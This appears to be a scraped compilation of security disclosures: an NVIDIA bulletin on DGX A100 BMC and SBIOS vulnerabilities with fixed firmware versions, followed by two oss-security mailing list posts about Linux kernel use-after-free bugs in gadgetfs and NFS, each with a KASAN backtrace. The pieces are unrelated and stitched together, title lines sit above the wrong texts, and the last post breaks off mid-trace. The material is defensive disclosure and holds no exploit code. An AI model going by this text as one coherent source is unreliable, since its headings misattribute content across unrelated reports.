NVIDIA BMC contains a vulnerability in IPMI handler, where an authorized attacker can cause a buffer overflow and cause a denial of service or gain code execution

**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2022‑42271

NVIDIA baseboard management controller (BMC) contains a vulnerability in the Intelligent Platform Management Interface (IPMI) handler, where an attacker with the required privileges can cause a buffer overflow, which may lead to denial of service or code execution.

8.4

AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42272

NVIDIA BMC contains a vulnerability in the IPMI handler, where an attacker with the required privileges can cause a buffer overflow, which may lead to code execution, denial of service, or escalation of privileges.

8.1

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42273

NVIDIA BMC contains a vulnerability in libwebsocket, where an attacker with the required privileges can cause a buffer overflow, which may lead to denial of service or code execution.

8.1

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVE‑2022‑42274

NVIDIA BMC contains a vulnerability in the IPMI handler, where an attacker with the required privileges can cause a buffer overflow, which may lead to denial of service or code execution.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42275

NVIDIA BMC contains a vulnerability in the IPMI handler, where an unauthenticated host is allowed to write to a host SPI flash, bypassing secure boot protections. An exploit of this vulnerability may lead to a loss of integrity or denial of service.

7.7

AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CVE‑2022‑42276

NVIDIA DGX A100 server contains a vulnerability in SBIOS in the SmiFlash, where a local user with elevated privileges can read, write, and erase the flash, which may lead to code execution, escalation of privileges, denial of service, or information disclosure. The scope of the impact can extend to other components.

7.5

AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE‑2022‑42277

NVIDIA DGX Station contains a vulnerability in SBIOS in the SmiFlash, where a local user with elevated privileges can read, write, and erase the flash, which may lead to code execution, escalation of privileges, denial of service, or information disclosure. The scope of the impact can extend to other components.

7.5

AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE‑2022‑42278

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can read and write to arbitrary locations within the memory context of the IPMI server process, which may lead to code execution, denial of service, information disclosure, or data tampering.

7.2

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42279

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can inject arbitrary shell commands, which may lead to code execution, denial of service, information disclosure, or data tampering.

7.2

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42289

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can inject arbitrary shell commands, which may lead to code execution, denial of service, information disclosure, or data tampering.

7.2

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42290

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can inject arbitrary shell commands, which may lead to code execution, denial of service, information disclosure, or data tampering.

7.2

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42280

NVIDIA BMC contains a vulnerability in the SPX REST authorization handler, where an unauthorized attacker can exploit a path traversal, which may lead to escalation of privileges.

7.1

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVE‑2022‑42281

NVIDIA DGX A100 contains a vulnerability in SBIOS in the FsRecovery, which may allow a highly privileged local attacker to cause an out-of-bounds write, which may lead to code execution, denial of service, loss of data integrity, or information disclosure.

6.7

AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42282

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can access arbitrary files, which may lead to information disclosure.

6.5

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE‑2022‑42283

NVIDIA BMC contains a vulnerability in the IPMI handler, where an attacker with the required privileges can cause a buffer overflow, which may lead to denial of service or code execution.

6.4

AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42284

NVIDIA BMC stores user passwords in an obfuscated form in a database accessible by the host, which may lead to exposure of user credentials.

6.2

AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE‑2022‑42285

DGX A100 SBIOS contains a vulnerability in the Pre-EFI Initialization (PEI) phase, where a privileged user can disable SPI flash protection, which may lead to denial of service, escalation of privileges, or data tampering.

6.0

AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE‑2022‑42286

DGX A100 SBIOS contains a vulnerability in Bds, which may lead to code execution, denial of service, or escalation of privileges.

6.0

AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE‑2022‑42287

NVIDIA BMC contains a vulnerability in the IPMI handler, where an attacker can upload and download arbitrary files under certain circumstances, which may lead to denial of service, escalation of privileges, information disclosure, or data tampering.

6.0

AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

CVE‑2022‑42288

NVIDIA BMC contains a vulnerability in the IPMI handler, where an unauthorized attacker can use certain oracles to guess a valid BMC username, which may lead to information disclosure.

5.3

AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates**

The following table lists the NVIDIA systems affected, firmware versions affected, and the updated version that includes this security update. To protect your system, download and install this firmware update through the NVIDIA Enterprise Support Portal.

**CVE IDs Addressed**

**Hardware Platform**

**System**

**Affected Versions**

**Updated Version**

CVE‑2022‑42276  
CVE‑2022‑42281  
CVE‑2022‑42285  
CVE‑2022‑42286

NVIDIA DGX servers

DGX A100

All SBIOS firmware versions prior to 1.18

SBIOS Firmware 1.18

CVE‑2022‑42271  
CVE‑2022‑42272  
CVE‑2022‑42273  
CVE‑2022‑42274  
CVE‑2022‑42275  
CVE‑2022‑42278  
CVE‑2022‑42279  
CVE‑2022‑42280  
CVE‑2022‑42282  
CVE‑2022‑42283  
CVE‑2022‑42284  
CVE‑2022‑42287  
CVE‑2022‑42288  
CVE‑2022‑42289  
CVE‑2022‑42290

NVIDIA DGX servers

DGX A100

All BMC firmware versions prior to 00.19.07

BMC Firmware 00.19.07

CVE‑2022‑42277

NVIDIA DGX servers

DGX Station A100

All SBIOS firmware versions prior to 10.16

SBIOS Firmware 10.16

**Notes:**

*   To get the updated firmware and SBIOS version listed in the table above, upgrade to the NVIDIA DGX A100 firmware container 22.12.1, or NVIDIA DGX Station A100 firmware container 22.2.1. Firmware updates are available through the NVIDIA Enterprise Support Portal.
    
*   See Security Updates for the version to install.
    
*   NVIDIA recommends that all BMC ports be restricted to a dedicated management network with firewall protection. If remote access to the BMC is required, such as for a system hosted at a co-location provider, the BMC should be accessed through a secure method that provides isolation from the Internet, such as through a VPN server.
    

**Acknowledgements**

All the vulnerabilities addressed in this bulletin were discovered by the NVIDIA Offensive Security Research (OSR) team.

**Additional Information**

AMI has reported potential security vulnerabilities in some AMI MegaRAC SP-X Baseboard Management Controllers that may allow user enumeration, unauthorized access, or arbitrary code execution. The NVIDIA DGX A100 BMC is affected by the following AMI vulnerabilities and plans to release an update to address them in May 2023.

*   CVE‑2022‑40259: AMI MegaRAC Redfish Arbitrary Code Execution
*   CVE‑2022‑40242: MegaRAC Default Credentials Vulnerability
*   CVE‑2022‑2827: AMI MegaRAC User Enumeration Vulnerability

The NVIDIA DGX-1, DGX-2, DGX Station A100 and DGX Station systems are not vulnerable to these CVEs.

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

2.0

January 10, 2023

Added CVE IDs omitted from the Security Updates table

1.0

December 19, 2022

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2022-42271: NVIDIA DGX A100 Server and DGX Station A100 - December 2022

A use-after-free flaw caused by a race among the superblock operations in the gadgetfs Linux driver was found. It could be triggered by yanking out a device that is running the gadgetfs side.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 14 Dec 2022 23:22:38 +0800
From: Gerald Lee <sundaywind2004@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: Linux Kernel: usb: A use-after-free Write in put\_dev

This was assigned CVE-2022-4382.

=\*=\*=\*=\*=\*=\*=\*=\*=     CREDIT     =\*=\*=\*=\*=\*=\*=\*=\*=

Zhixin Li from Zero-one Security <sundaywind2004@...il.com>


Thanks.


On Tue, Dec 13, 2022 at 2:53 PM Gerald Lee <sundaywind2004@...il.com> wrote:
>
> Hi all,
>
> =\*=\*=\*=\*=\*=\*=\*=\*=   BUG DETAILS  =\*=\*=\*=\*=\*=\*=\*=\*=
>
> This use-after-free violation is caused by a race among the superblock
> operations in the gadgetfs driver. The vulnerability may not be a big
> deal, because the normal user can't execute umount. It could be
> triggered by yanking out a device that is running the gadgetfs side,
> but I don't know how to do that.
>
> C repro is attached.
>
> =\*=\*=\*=\*=\*=\*=\*=\*=     BACKTRACE     =\*=\*=\*=\*=\*=\*=\*=\*=
> BUG: KASAN: use-after-free in instrument\_atomic\_read\_write
> include/linux/instrumented.h:102 \[inline\]
> BUG: KASAN: use-after-free in atomic\_fetch\_sub\_release
> include/linux/atomic/atomic-instrumented.h:176 \[inline\]
> BUG: KASAN: use-after-free in \_\_refcount\_sub\_and\_test
> include/linux/refcount.h:272 \[inline\]
> BUG: KASAN: use-after-free in \_\_refcount\_dec\_and\_test
> include/linux/refcount.h:315 \[inline\]
> BUG: KASAN: use-after-free in refcount\_dec\_and\_test
> include/linux/refcount.h:333 \[inline\]
> BUG: KASAN: use-after-free in put\_dev+0x22/0xd0
> drivers/usb/gadget/legacy/inode.c:159
> Write of size 4 at addr ffff8880436d2040 by task syz-executor.5/7587
>
> CPU: 1 PID: 7587 Comm: syz-executor.5 Not tainted 6.1.0-rc7 #1
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
> 1.13.0-1ubuntu1.1 04/01/2014
> Call Trace:
>  <TASK>
>  \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
>  dump\_stack\_lvl+0xd1/0x138 lib/dump\_stack.c:106
>  print\_address\_description mm/kasan/report.c:284 \[inline\]
>  print\_report+0x15e/0x45d mm/kasan/report.c:395
>  kasan\_report+0xbf/0x1f0 mm/kasan/report.c:495
>  check\_region\_inline mm/kasan/generic.c:183 \[inline\]
>  kasan\_check\_range+0x141/0x190 mm/kasan/generic.c:189
>  instrument\_atomic\_read\_write include/linux/instrumented.h:102 \[inline\]
>  atomic\_fetch\_sub\_release
> include/linux/atomic/atomic-instrumented.h:176 \[inline\]
>  \_\_refcount\_sub\_and\_test include/linux/refcount.h:272 \[inline\]
>  \_\_refcount\_dec\_and\_test include/linux/refcount.h:315 \[inline\]
>  refcount\_dec\_and\_test include/linux/refcount.h:333 \[inline\]
>  put\_dev+0x22/0xd0 drivers/usb/gadget/legacy/inode.c:159
>  gadgetfs\_kill\_sb+0x2e/0x60 drivers/usb/gadget/legacy/inode.c:2086
>  deactivate\_locked\_super+0x98/0x160 fs/super.c:332
>  vfs\_get\_super fs/super.c:1190 \[inline\]
>  get\_tree\_single+0x188/0x1d0 fs/super.c:1207
>  vfs\_get\_tree+0x8d/0x2f0 fs/super.c:1531
>  vfs\_fsconfig\_locked fs/fsopen.c:232 \[inline\]
>  \_\_do\_sys\_fsconfig+0x8d6/0xc20 fs/fsopen.c:439
>  do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
>  do\_syscall\_64+0x39/0xb0 arch/x86/entry/common.c:80
>  entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
> RIP: 0033:0x7f8d5129078d
> Code: c3 e8 17 32 00 00 0f 1f 80 00 00 00 00 f3 0f 1e fa 48 89 f8 48
> 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d
> 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
> RSP: 002b:00007f8d52024bd8 EFLAGS: 00000246 ORIG\_RAX: 00000000000001af
> RAX: ffffffffffffffda RBX: 00007f8d513cbf80 RCX: 00007f8d5129078d
> RDX: 0000000000000000 RSI: 0000000000000006 RDI: 0000000000000003
> RBP: 00007f8d512feb02 R08: 0000000000000000 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
> R13: 00007ffd48293eff R14: 00007ffd48294090 R15: 00007f8d52024d80
>  </TASK>
>
> Allocated by task 7561:
>  kasan\_save\_stack+0x22/0x40 mm/kasan/common.c:45
>  kasan\_set\_track+0x25/0x30 mm/kasan/common.c:52
>  \_\_\_\_kasan\_kmalloc mm/kasan/common.c:371 \[inline\]
>  \_\_\_\_kasan\_kmalloc mm/kasan/common.c:330 \[inline\]
>  \_\_kasan\_kmalloc+0xa5/0xb0 mm/kasan/common.c:380
>  kmalloc include/linux/slab.h:553 \[inline\]
>  kzalloc include/linux/slab.h:689 \[inline\]
>  dev\_new drivers/usb/gadget/legacy/inode.c:170 \[inline\]
>  gadgetfs\_fill\_super+0x1e4/0x460 drivers/usb/gadget/legacy/inode.c:2041
>  vfs\_get\_super fs/super.c:1169 \[inline\]
>  get\_tree\_single+0xd6/0x1d0 fs/super.c:1207
>  vfs\_get\_tree+0x8d/0x2f0 fs/super.c:1531
>  vfs\_fsconfig\_locked fs/fsopen.c:232 \[inline\]
>  \_\_do\_sys\_fsconfig+0x8d6/0xc20 fs/fsopen.c:439
>  do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
>  do\_syscall\_64+0x39/0xb0 arch/x86/entry/common.c:80
>  entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
>
> Last potentially related work creation:
>  kasan\_save\_stack+0x22/0x40 mm/kasan/common.c:45
>  \_\_kasan\_record\_aux\_stack+0xbc/0xd0 mm/kasan/generic.c:481
>  call\_rcu+0x9d/0x820 kernel/rcu/tree.c:2798
>  pwq\_unbound\_release\_workfn+0x26b/0x340 kernel/workqueue.c:3736
>  process\_one\_work+0x9bf/0x1710 kernel/workqueue.c:2289
>  worker\_thread+0x669/0x1090 kernel/workqueue.c:2436
>  kthread+0x2e8/0x3a0 kernel/kthread.c:376
>  ret\_from\_fork+0x1f/0x30 arch/x86/entry/entry\_64.S:306
>
> Second to last potentially related work creation:
>  kasan\_save\_stack+0x22/0x40 mm/kasan/common.c:45
>  \_\_kasan\_record\_aux\_stack+0xbc/0xd0 mm/kasan/generic.c:481
>  call\_rcu+0x9d/0x820 kernel/rcu/tree.c:2798
>  pwq\_unbound\_release\_workfn+0x26b/0x340 kernel/workqueue.c:3736
>  process\_one\_work+0x9bf/0x1710 kernel/workqueue.c:2289
>  worker\_thread+0x669/0x1090 kernel/workqueue.c:2436
>  kthread+0x2e8/0x3a0 kernel/kthread.c:376
>  ret\_from\_fork+0x1f/0x30 arch/x86/entry/entry\_64.S:306
>
> The buggy address belongs to the object at ffff8880436d2000
>  which belongs to the cache kmalloc-1k of size 1024
> The buggy address is located 64 bytes inside of
>  1024-byte region \[ffff8880436d2000, ffff8880436d2400)
>
> The buggy address belongs to the physical page:
> page:ffffea00010db400 refcount:1 mapcount:0 mapping:0000000000000000
> index:0x0 pfn:0x436d0
> head:ffffea00010db400 order:3 compound\_mapcount:0 compound\_pincount:0
> flags: 0x4fff00000010200(slab|head|node=1|zone=1|lastcpupid=0x7ff)
> raw: 04fff00000010200 dead000000000100 dead000000000122 ffff888012041dc0
> raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000
> page dumped because: kasan: bad access detected
> page\_owner tracks the page as allocated
> page last allocated via order 3, migratetype Unmovable, gfp\_mask
> 0x52a20(GFP\_ATOMIC|\_\_GFP\_NOWARN|\_\_GFP\_NORETRY|\_\_GFP\_COMP), pid 6599,
> tgid 6599 (syz-executor.0), ts 29294571719, free\_ts 29285126043
>  prep\_new\_page mm/page\_alloc.c:2539 \[inline\]
>  get\_page\_from\_freelist+0x10b5/0x2d50 mm/page\_alloc.c:4291
>  \_\_alloc\_pages+0x1cb/0x5b0 mm/page\_alloc.c:5558
>  alloc\_pages+0x1aa/0x270 mm/mempolicy.c:2285
>  alloc\_slab\_page mm/slub.c:1794 \[inline\]
>  allocate\_slab+0x213/0x300 mm/slub.c:1939
>  new\_slab mm/slub.c:1992 \[inline\]
>  \_\_\_slab\_alloc+0xa9b/0x13e0 mm/slub.c:3180
>  \_\_slab\_alloc.constprop.0+0x56/0xa0 mm/slub.c:3279
>  slab\_alloc\_node mm/slub.c:3364 \[inline\]
>  \_\_kmem\_cache\_alloc\_node+0x199/0x3e0 mm/slub.c:3437
>  kmalloc\_trace+0x26/0x60 mm/slab\_common.c:1045
>  kmalloc include/linux/slab.h:553 \[inline\]
>  kzalloc include/linux/slab.h:689 \[inline\]
>  batadv\_hardif\_add\_interface net/batman-adv/hard-interface.c:864 \[inline\]
>  batadv\_hard\_if\_event+0x8a1/0x1450 net/batman-adv/hard-interface.c:952
>  notifier\_call\_chain+0xb5/0x200 kernel/notifier.c:87
>  call\_netdevice\_notifiers\_info+0xb5/0x130 net/core/dev.c:1945
>  call\_netdevice\_notifiers\_extack net/core/dev.c:1983 \[inline\]
>  call\_netdevice\_notifiers net/core/dev.c:1997 \[inline\]
>  register\_netdevice+0x10bf/0x1670 net/core/dev.c:10090
>  veth\_newlink+0x4d1/0x990 drivers/net/veth.c:1795
>  rtnl\_newlink\_create net/core/rtnetlink.c:3364 \[inline\]
>  \_\_rtnl\_newlink+0x1084/0x17e0 net/core/rtnetlink.c:3581
>  rtnl\_newlink+0x68/0xa0 net/core/rtnetlink.c:3594
>  rtnetlink\_rcv\_msg+0x43e/0xca0 net/core/rtnetlink.c:6091
> page last free stack trace:
>  reset\_page\_owner include/linux/page\_owner.h:24 \[inline\]
>  free\_pages\_prepare mm/page\_alloc.c:1459 \[inline\]
>  free\_pcp\_prepare+0x65c/0xd90 mm/page\_alloc.c:1509
>  free\_unref\_page\_prepare mm/page\_alloc.c:3387 \[inline\]
>  free\_unref\_page+0x1d/0x4d0 mm/page\_alloc.c:3483
>  qlink\_free mm/kasan/quarantine.c:168 \[inline\]
>  qlist\_free\_all+0x6a/0x170 mm/kasan/quarantine.c:187
>  kasan\_quarantine\_reduce+0x184/0x210 mm/kasan/quarantine.c:294
>  \_\_kasan\_slab\_alloc+0x66/0x90 mm/kasan/common.c:302
>  kasan\_slab\_alloc include/linux/kasan.h:201 \[inline\]
>  slab\_post\_alloc\_hook mm/slab.h:737 \[inline\]
>  slab\_alloc\_node mm/slub.c:3398 \[inline\]
>  \_\_kmem\_cache\_alloc\_node+0x2e2/0x3e0 mm/slub.c:3437
>  kmalloc\_trace+0x26/0x60 mm/slab\_common.c:1045
>  kmalloc include/linux/slab.h:553 \[inline\]
>  kzalloc include/linux/slab.h:689 \[inline\]
>  kset\_create lib/kobject.c:937 \[inline\]
>  kset\_create\_and\_add+0x4f/0x1a0 lib/kobject.c:980
>  register\_queue\_kobjects net/core/net-sysfs.c:1766 \[inline\]
>  netdev\_register\_kobject+0x1ca/0x400 net/core/net-sysfs.c:2019
>  register\_netdevice+0xd99/0x1670 net/core/dev.c:10057
>  \_\_ip\_tunnel\_create+0x398/0x570 net/ipv4/ip\_tunnel.c:267
>  ip\_tunnel\_init\_net+0x2ec/0x9f0 net/ipv4/ip\_tunnel.c:1073
>  ops\_init+0xb9/0x680 net/core/net\_namespace.c:135
>  setup\_net+0x5d1/0xc50 net/core/net\_namespace.c:332
>  copy\_net\_ns+0x31c/0x760 net/core/net\_namespace.c:478
>  create\_new\_namespaces+0x3f6/0xb20 kernel/nsproxy.c:110
>
> Memory state around the buggy address:
>  ffff8880436d1f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>  ffff8880436d1f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
> >ffff8880436d2000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
>                                            ^
>  ffff8880436d2080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
>  ffff8880436d2100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
> ==================================================================
>
>
> =\*=\*=\*=\*=\*=\*=\*=\*=     PATCH     =\*=\*=\*=\*=\*=\*=\*=\*=
>
> The patch has been done by Alan Stern, and it can be found here:
> https://lore.kernel.org/linux-usb/Y5dV11OoM3ojxNHy@rowland.harvard.edu/
>
> Thanks.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-4382: security - Re: Linux Kernel: usb: A use-after-free Write in put_dev

A use-after-free vulnerability was found in __nfs42_ssc_open() in fs/nfs/nfs4file.c in the Linux kernel. This flaw allows an attacker to conduct a remote denial

**oss-sec mailing list archives**

_From_: Xingyuan Mo <hdthky0 () gmail com>  
_Date_: Wed, 14 Dec 2022 16:31:25 +0800  

Hello,

We found a use-after-free vulnerability in \_\_nfs42\_ssc\_open() in NFS subsystem
of Linux through v6.1 which allows an attacker to trigger remote denial of
service.

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Details  =\*=\*=\*=\*=\*=\*=\*=\*=

The use-after-free violation is caused by dereferencing a vfsmount which is
freed but still remains on the delayed unmount list. The reason the vfsmount is
freed is that nfs42\_ssc\_open returns an error when called in
nfsd4\_do\_async\_copy. During my testing, this bug can be triggered by two
consecutive inter-server-side copies, if the first one encounters some kind of
error.

=\*=\*=\*=\*=\*=\*=\*=\*=  Backtrace  =\*=\*=\*=\*=\*=\*=\*=\*=

\[  150.198088 \] ==================================================================
\[  150.199766 \] BUG: KASAN: use-after-free in \_\_nfs42\_ssc\_open (fs/nfs/nfs4file.c:332)
\[  150.201108 \] Read of size 8 at addr ffff888008bbc4a8 by task copy thread/375
\[  150.203035 \]
\[  150.203392 \] CPU: 4 PID: 375 Comm: copy thread Not tainted 6.1.0-rc8 #20
\[  150.204790 \] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/04
\[  150.206709 \] Call Trace:
\[  150.207271 \]  <TASK>
\[  150.207740 \] dump\_stack\_lvl (lib/dump\_stack.c:107)
\[  150.208562 \] print\_report (mm/kasan/report.c:285 mm/kasan/report.c:395)
\[  150.209385 \] ? \_\_virt\_addr\_valid (./include/linux/mmzone.h:1759 ./include/linux/mmzone.h:1855 
arch/x86/mm/physaddr.c:65)
\[  150.210296 \] ? \_\_nfs42\_ssc\_open (fs/nfs/nfs4file.c:332)
\[  150.211184 \] kasan\_report (mm/kasan/report.c:162 mm/kasan/report.c:497)
\[  150.211967 \] ? \_\_nfs42\_ssc\_open (fs/nfs/nfs4file.c:332)
\[  150.212742 \] \_\_nfs42\_ssc\_open (fs/nfs/nfs4file.c:332)
\[  150.213343 \] ? \_raw\_read\_lock\_bh (kernel/locking/spinlock.c:161)
\[  150.213935 \] nfsd4\_do\_async\_copy (./include/linux/nfs\_ssc.h:47 fs/nfsd/nfs4proc.c:1764)
\[  150.214520 \] ? preempt\_count\_sub (kernel/sched/core.c:5697)
\[  150.215133 \] ? \_\_kthread\_parkme (kernel/kthread.c:283)
\[  150.215769 \] ? nfsd4\_read (fs/nfsd/nfs4proc.c:1757)
\[  150.216349 \] kthread (kernel/kthread.c:376)
\[  150.216873 \] ? kthread\_complete\_and\_exit (kernel/kthread.c:331)
\[  150.217630 \] ret\_from\_fork (arch/x86/entry/entry\_64.S:312)
\[  150.218206 \]  </TASK>
\[  150.218551 \]
\[  150.218803 \] Allocated by task 350:
\[  150.219348 \] kasan\_save\_stack (mm/kasan/common.c:46)
\[  150.219938 \] kasan\_set\_track (mm/kasan/common.c:52)
\[  150.220522 \] \_\_kasan\_slab\_alloc (mm/kasan/common.c:328)
\[  150.221148 \] kmem\_cache\_alloc (./include/linux/kasan.h:201 mm/slab.h:737 mm/slub.c:3398 mm/slub.c:3406 
mm/slub.c:3413 mm/slub.c:3422)
\[  150.221786 \] alloc\_vfsmnt (./include/linux/slab.h:679 fs/namespace.c:198)
\[  150.222348 \] vfs\_create\_mount (fs/namespace.c:1017)
\[  150.222919 \] vfs\_kern\_mount.part.48 (fs/namespace.c:1073)
\[  150.223376 \] nfsd4\_interssc\_connect.isra.24 (fs/nfsd/nfs4proc.c:1443)
\[  150.223915 \] nfsd4\_copy (fs/nfsd/nfs4proc.c:1499 fs/nfsd/nfs4proc.c:1805)
\[  150.224249 \] nfsd4\_proc\_compound (fs/nfsd/nfs4proc.c:2710)
\[  150.224647 \] nfsd\_dispatch (fs/nfsd/nfssvc.c:1056)
\[  150.225000 \] svc\_process\_common (net/sunrpc/svc.c:1339)
\[  150.225403 \] svc\_process (net/sunrpc/svc.c:1463)
\[  150.225735 \] nfsd (fs/nfsd/nfssvc.c:979)
\[  150.226022 \] kthread (kernel/kthread.c:376)
\[  150.226330 \] ret\_from\_fork (arch/x86/entry/entry\_64.S:312)
\[  150.226662 \]
\[  150.226810 \] Freed by task 0:
\[  150.227072 \] kasan\_save\_stack (mm/kasan/common.c:46)
\[  150.227417 \] kasan\_set\_track (mm/kasan/common.c:52)
\[  150.227765 \] kasan\_save\_free\_info (mm/kasan/generic.c:513)
\[  150.228134 \] \_\_kasan\_slab\_free (mm/kasan/common.c:238 mm/kasan/common.c:200 mm/kasan/common.c:244)
\[  150.228497 \] kmem\_cache\_free (mm/slub.c:1750 mm/slub.c:3661 mm/slub.c:3683)
\[  150.228842 \] rcu\_core (./arch/x86/include/asm/preempt.h:27 kernel/rcu/tree.c:2257 kernel/rcu/tree.c:2510)
\[  150.229144 \] \_\_do\_softirq (./arch/x86/include/asm/jump\_label.h:27 ./include/linux/jump\_label.h:207 
./include/trace/events/irq.h:142 kernel/softirq.c:572)
\[  150.229483 \]
\[  150.229636 \] Last potentially related work creation:
\[  150.230102 \] kasan\_save\_stack (mm/kasan/common.c:46)
\[  150.230470 \] \_\_kasan\_record\_aux\_stack (mm/kasan/generic.c:481)
\[  150.230901 \] call\_rcu (./arch/x86/include/asm/irqflags.h:29 (discriminator 3) ./arch/x86/include/asm/irqflags.h:70 
(discriminator 3) ./arch/x86/include/asm/irqflags.h:106 (discriminator 3) kernel/rcu/tree.c:2799 (discriminator 3))
\[  150.231214 \] mntput\_no\_expire (fs/namespace.c:1272)
\[  150.231586 \] nfsd4\_do\_async\_copy (./include/linux/slab.h:553 ./include/linux/slab.h:689 fs/nfsd/nfs4proc.c:1734 
fs/nfsd/nfs4proc.c:1787)
\[  150.231980 \] kthread (kernel/kthread.c:376)
\[  150.232295 \] ret\_from\_fork (arch/x86/entry/entry\_64.S:312)
\[  150.232637 \]
\[  150.232792 \] The buggy address belongs to the object at ffff888008bbc480
\[  150.232792 \]  which belongs to the cache mnt\_cache of size 320
\[  150.233849 \] The buggy address is located 40 bytes inside of
\[  150.233849 \]  320-byte region \[ffff888008bbc480, ffff888008bbc5c0)
\[  150.234828 \]
\[  150.234970 \] The buggy address belongs to the physical page:
